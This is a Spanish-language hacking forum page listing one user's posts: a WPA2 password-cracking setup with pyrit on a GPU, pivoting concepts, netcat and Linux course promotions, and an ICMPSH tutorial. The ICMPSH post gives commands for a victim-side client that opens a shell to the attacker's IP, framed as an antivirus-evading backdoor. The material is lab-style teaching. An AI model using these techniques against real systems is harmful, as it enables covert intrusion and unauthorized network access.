Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Xc0d3's

#1
GNU/Linux / Curso de Linux desde cero
Marzo 19, 2022, 06:24:58 PM
Hola comunidad!

Hace mucho que no publico contenido en el foro, recién me he animado a publicar contenido gratuito nuevamente y esta vez quiero invitarlos a formar parte de varios cursos de pago (de mi propia academia) que estaré liberando en YouTube, el primero es un curso de Linux completamente desde cero hasta nivel avanzado. Creo que es una buena oportunidad para los que se inician en Linux y porque no, también para los que ya tienen algunos conocimientos.

Les dejo un enlace a la lista de reproducción en YouTube: "Aprende Linux desde Cero"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Me encantaría aprovechar el foro para darle soporte a las clases que estaré subiendo.

Saludos!
#2
Hola Underc0ders!

Quiero compartir con ustedes este tutorial sobre como configurar la tarjeta gráfica para optimizar el cracking de contraseñas WPA2 mediante ataque de diccionario al handshake con Pyrit.

- Las pruebas las he realizado en Ubuntu 16.04 con los siguientes paquetes instalados:

aircrack-ng
pyrit
pyrit-opencl
nvidia-375 (driver de la tarjeta grafica)
nvidia-settings

- Hardware utilizado para realizar las pruebas:

CPU Intel Core i7 5500U @ 2.4GHz x 4 (2 nucleos 4 hilos)

GPU Nvidia Quadro K620M, 2GB, 64bit, 384 CUDA Cores.

Memoria RAM 16 GB DDR3 1600 MHz (esto no influye)

No voy a explicar la parte de como capturar el "4 way handshake", aquí en el foro hay muchos tutoriales sobre eso, de todas maneras para los nuevos usuarios he dejado un video al final del post con todo el proceso.

Asumiendo que ya tenemos el handshake, pasamos a instalar los paquetes necesarios, antes debemos activar el repositorio multiverse.

Ubuntu 16.04:
Código: php

usuario@ubuntu:~$ sudo apt-add-repository multiverse && sudo apt-get update
usuario@ubuntu:~$ sudo apt-get search nvidia
.......
nvidia-304 - NVIDIA legacy binary driver - version 304.135
nvidia-304-updates - Transitional package for nvidia-304
nvidia-304-updates-dev - Transitional package for nvidia-304-dev
nvidia-340 - NVIDIA binary driver - version 340.102
nvidia-361 - Transitional package for nvidia-367
nvidia-361-dev - Transitional package for nvidia-367-dev
nvidia-367 - Transitional package for nvidia-375
nvidia-367-dev - Transitional package for nvidia-375-dev
nvidia-375 - NVIDIA binary driver - version 375.66
nvidia-375-dev - NVIDIA binary Xorg driver development files
.........


Luego deben instalar los paquetes necesarios, en el caso del driver para nvidia, deben instalar el último driver disponible.

Código: php
usuario@ubuntu:~$ sudo apt-get install pyrit pyrit-opencl nvidia-375 nvidia-settings -y 




Parrot Security:

Deben cheaquear que su tarjeta gráfica este en la lista de compatibilidad, en el siguiente link pueden chequear esta información.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Luego deben instalar los paquetes necesarios:

Código: php
┌─[user@parrot]─[~]
└──╼ $ sudo apt-get update && sudo apt-get dist-upgrade
┌─[user@parrot]─[~]
└──╼ $sudo apt-get install nvidia-driver bumblebee-nvidia pyrit-opencl


  Editar archivo de configuración
 
Código: php
 ┌─[user@parrot]─[~]
└──╼ $sudo nano /etc/bumblebee/bumblebee.conf





Reincie su sistema y compruebe la versión de instalación de Nvidia
 
Código: php
 ┌─[user@parrot]─[~]
└──╼ $ optirun glxinfo | Grep OpenGL



Si todos los paquetes se instalaron correctamente podemos pasar a realizar la prueba de rendimiento de pyrit

Código: php
xc0d3@thinkpad-w550s:~/scripts$ pyrit benchmark
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (27635.7 PMKs/s)... \

Computed 27635.68 PMKs/s total.
#1: 'OpenCL-Device 'Quadro K620M'': 28886.4 PMKs/s (RTT 2.8)
#2: 'CPU-Core (SSE2)': 324.8 PMKs/s (RTT 3.2)
#3: 'CPU-Core (SSE2)': 328.6 PMKs/s (RTT 3.1)
#4: 'CPU-Core (SSE2)': 321.1 PMKs/s (RTT 3.2)
xc0d3@thinkpad-w550s:~/scripts$


Se puede apreciar como pyrit ha sustituido uno de los nucleos de mi CPU y en su lugar esta usando la GPU, la cual es aproximadamente 20 veces más eficiente que el CPU. He logrado resultados de hasta 32000PMK/s, dicionarios como el rouckyou es cuestion de unos 6mins probar todas las posibles contraseñas, aun no he realizado las pruebas con Base de Datos, creo que con este rendimiento puede pasar de 30 000 000 PMK/s.

Saludos!

Video Tutorial con todo el proceso de Cracking desde aircrack-ng hasta Pyrit:


#3
Hacking / [Video Tutorial] Tutorial de Netcat
Septiembre 02, 2017, 08:00:47 PM
Hola underc0ders!

Hoy quiero compartir con la comunidad este video tutorial de Netcat, una exelente herramienta para hackers y administradores de sistema.

Descripción breve:
Netcat es una herramienta de red, que nos permite leer y escribir tanto en protocolos TCP como UDP. Puede correr en modo cliente y en modo servidor, se puede utilizar para leer banners, como port-scanner, para transferir archivos, para chat, para ejecutar bind-shells y reverse-shells. En fin, estas características hacen que Netcat sea apodada como   "La navaja suiza de los Hacker".

Aquí les dejo el video, espero lo disfruten. Saludos ;)

#4
Hola Underc0ders!

Esta ves quiero compartir con ustedes sobre un curso en el que estoy trabajando, al cual le estoy poniendo muchas ganas. El curso lo voy a ir publicando en mi canal de YouTube y en la Documentación Official de Parrot Security OS en Español. Tengo pensado dar toda una introducción a lo que es GNU/Linux, Instalación del Sistema, la Shell, Comandos Básicos, Trabajo con archivos, Editores de texto, Networking, Bash y Python scripting y bueno ya creada esta base en los estudiantes comenzaré con una Introducción al Hacking Ético y luego nos adentraremos en el mundo del Pentesting ya como tal.  El curso lo voy a desarrollar narrado, completamente en español, con soporte via Telegram-Messenger (para los estudiantes que tengan dudas o necesiten una atención diferenciada) todo esto de totalmente gratis y por su puesto con Parrot Security, esto no quiere decir que no sirva para usuarios de Kali-Linux u otras distribuciones de pentesting, al final los conseptos, las tecnicas y las herramientas son las mismas. Los invito a que chequeen la Presentación del Curso y bueno si creen que vale la pena el contenido animense a seguirlo ya sea en el Canal de YouTube o en la página de la Documentación de Parrot Security.

Saludos ;)

Link en la Documentación de Parrot Security:
Código: php
https://docs.parrotsec-es.org/doku.php?id=curso_de_hacking_etico


#5
 Hola underc0ders!

Esta vez quiero compartír este post sobre Pivoting, esta exelente técnica utilizada por los Hackers que consiste en utilizar sistemas comprometidos para atacar otros sistemas en la misma red corporativa o red privada del sistema previamente comprometido, con el fin de evitar restricciones de NAT, configuraciones de Firewalls y Sistemas de Detención y/o Prevención de Intrusos (IDS/IPS). Por ejemplo, si comprometemos la seguridad de un servidor mediante esta técnica podemos utilizar ese servidor para continuar con la explotación y post-explotación a otros ordenadores en su red privada.

Exiten dos tipos de Pivoting.
Proxy Pivoting; consiste en la práctica de canalizar el trafico a travéz de un ordenador comprometido utilizandolo de proxy para lanzar ataques a otros ordenadores en su misma red privada, para burlar posibles filtros de IP, configuraciones de Firewalls o simplemente para ocultar nuestra verdadera dirección IP.

VPN Pivoting; consiste en crear un túnel encriptado en el ordenador comprometido y de esta forma redirigir dinámicamente todo el tráfico a través de ese ordenador comprometido para hacer reconodimiento en su red privada, escaneos de vulnerabilidades y explotación de posibles vulnerabilidades encontradas, no importa si esta detras de un Firewall o detras de un NAT en una red privada.

Por lo general ambos tipo de Pivoting son ejecutados en el ordenador comprometido al igual que los payloads que ejecutamos al explotar una vulnerabilidad utilizando un exploit. Al atacar una ordenador vulnerable de la red y conseguír acceso al mismo, un atacante podría infectar la mayoría o la totalidad de ordenadores de una red y obtener un control completo de los ordenadores de una compañia o de una red privada como tal.

A continuación les dejo un video en que que se demuestra un ataque de tipo VPN Pivoting.

Esenario:
Nota: en el video las IPs de los ordenadores son distintas.

Ordenadores                               Foto                      Video
atacante (Parrot Security) ----> 199.16.45.52    =    172.25.12.84
víctima 1 (Windows 10) -------> 192.168.78.5    =    172.25.12.143
víctima 2 (Windows 7 ) --------> 192.168.78.25  =    192.168.56.103


#6

Hola a todos!

Esta vez les quiero hablar un poquito sobre Parrot Security y la Comunidad Hispana de Parrot.

Hace aproximadamente 10 meses, me decidí a probar esta distribución orientada a Pruebas de Penetración, Forenses Digitales, Programación y Protección de la Privacidad, estuve probando el sistema por un par de meses en el Virtual Lab y me gusto mucho, poco tiempo despues decidí buscar más información sobre el proyecto, sus desarrolladores, su pequeña comunidad y decidí involucrarme un poquito más con ellos. Realmente ahí fue cuando de verdad comenzo a gustarme Parrot Security OS, cuando comenze a compartir con los miembros de su comunidad. Comunidad que se ha ido dividiendo de cierta forma, ya que hay varias comunidades en varios idiomas (al final todos forman parte de la Comunidad Official) y bueno es digno de admirar el trabajo que esta realizando la Comunidad Hispana de Parrot Security, la cual aboga mucho por el crecimiento de la Documentación en Español de temas en general de TI, GNU/Linux, Programación, Hacking y Seguridad Informática.

Hace unos pocos días el equipo comenzó trabajar en el Sitio Web Official de la Comunidad Hispana, en traducciones y creación de documentación en español para los que se inician en este mundo y para los que quieran probar algo diferente, algo nuevo. Bueno resumiendo un poquito, Hoy se hizo pública la Documentación Official en el Sitio Official de la Comunidad Hispana de Parrot Security OS.  Es digno de admirar el trabajo que realizan esos muchachos, sin ningun interes, solo con el objetivo de ayudar a otros y compartír lo que cada uno puede compartír.

Aquí les dejo el Sitio Official de la Comunidad Hispana, el link a la documentación y el link a la biblioteca virtual de la comunidad, realmente se los recomiendo, hay muy buen contenido en esta biblioteca y esta en constante actualización.

Sitio web Official de la Comunidad Hispana
Código: php
https://parrotsec-es.org


Documentación
Código: php
https://docs.parrotsec-es.org


Biblioteca
Código: php
https://biblioteca.parrotsec-es.org/index.php/s/sd2br2Vjv6tMigq


Documentación en PDF
Código: php
https://github.com/josegatica/parrot-docu-es/blob/master/ParrotSec-ES_Doc-1.0.pdf



Saludos, espero encuentren información interesante.
#7

Hola a todos!

Quiero compartir con ustedes este par de videos que hice inspirado en un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que quedó algo inconcluso hace un tiempo y bueno hace poco me decidí a hacer el video para compartirlo con mis colegas en YouTube.

  En el ataque use una Raspberry PI 3 con Kali-Linux, precisamente para demostrar cuan eficiente puede ser esta técnica ya que el rendimiento de una Raspberry PI para este tipo de ataque de diccionario o fuerza bruta es muy pobre.

En el primer video, demuestro la técnica limpia para sacar el handshake y crackear la password de la red sin Rainbow Table y en el segundo video les muestro como crear estas Rainbow Tables para aumentar considerablemente el rendimiento de Pyrit.

Video número 1, rendimiento = 145 PMKs:

Video número 2, rendimiento = 323524 PMKs:


Bueno esto es todo por ahora, si tienen alguna duda con el procedimiento, déjenlas en los comentarios.

Saludos... ;)
#8
 Hola Underc0ders!

  Quiero compartir con ustedes este post sobre esta curiosa herramienta llamada ICMPSH, es un shell que funciona a través del protocolo ICMP modificando peticiones y respuestas ICMP  entre dos ordenadores. Esta herramienta no requiere permisos adminsitrativos  para ser ejecutado en el sistema víctima y no utiliza ningún puerto ya que funciona a través del protocolo ICMP, lo que la diferencia considerablemente de otras herramientas similares. Su uso es muy simple y esta "aparentemente" libre de código malicioso lo cual la convierte en una herramienta perfecta para dejar puertas traseras en Windows.
  El esclavo está programado en C y se ejecuta sólo en un ordenador con sistema operativo Windows mientras que el maestro o servidor se puede ejecutar en cualquier sistema operativo.
  La herramienta fue desarrollada por Nico Leidecker quien originalmente la escribió  en C y Perl. En este tutorial voy a usar la versión portada a Python, la cual puede encontrar en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


  Modo de uso:

  Las versiones escritas en C y Python no necesitan dependencias o librerías extras, antes de ejecutar el servidor en la maquina atacante (es este caso Parrot Security) es necesario desactivar las respuestas ICMP en el Sistema Operativo, para ello ejecutamos en siguiente comando:
Código: php

┌─[root@parrot]─[~]
└──╼ # sysctl -w net.ipv4.icmp_echo_ignore_all=1



Descargamos la herramienta desde GitHub:
Código: php

┌─[root@parrot]─[~]
└──╼ # git clone https://github.com/inquisb/icmpsh.git


Luego entramos en el directorio icmpsh y ejecutamos el Servidor:
Código: php

┌─[root@parrot]─[~]
└──╼ # cd icmpsh
┌─[root@parrot]─[~/icmpsh]
└──╼ # python icmpsh.py 192.168.56.102 192.168.56.101


Nota: 192.168.56.102 es la IP del Atacante y 192.168.56.101 es la IP de la Victima.

En la máquina de la víctima usamos el cliente icmpsh.exe que está incluido en el repo que descargamos de GitHub, debemos copiarlo a la máquina víctima antes.

Ejemplo de uso:
Código: php

C:\> icmpsh.exe -t 192.168.56.102



  El resultado sería una Shell de Windows en nuestro sistema atacante.

  Deben estar pensando "a que víctima se le ocurre ejecutar icmpsh.exe en CMD y luego mirar la ventana negra para que podamos jugar libremente con su Shell" ... También lo pensé cuando vi la herramienta y se me ocurrió usarla con estos fines, pero me dije: "es una excelente manera de dejar una puerta trasera indetectable por Antivirus y Firewalls en Windows", por supuesto, antes tenemos que comprometer la seguridad de ese equipo y obtener acceso remoto, de esta manera podemos dejar nuestras archivos de backdoor, totalmente indetectable.

  En este vídeo los dejo un ejemplo de cómo es el proceso para crear la puerta trasera, pueden seguir los pasos del vídeo en su Laboratorio Virtual para preparar la puerta trasera y luego subir los archivos desde una sesión meterpreter en el ordenador de la victima.



  Esto es todo por ahora, espero este post les paresca interesante y les sirva de ayuda en algún momento. Si tienes alguna duda con el procedimiento, déjenlas en los comentarios.

  Saludos... Happy Hacking ;)
#9
Presentaciones y cumpleaños / Hola Underc0ders!
Agosto 16, 2017, 04:42:34 PM
Hace algún tiempo fuí miembro de este Foro del cual he estado ausente por razones personales. En ese momento aprendí mucho con esta gran comunidad, ahora regreso y no sólo con la intención de aprender, sino también para contribuir y compartir conocimientos y experiencias con ustedes. He notado que el sitio ha cambiado mucho desde la última vez que lo visité, han hecho un exelente trabajo. Bueno espero poder compartir por mucho tiempo con ustedes.


Saludos!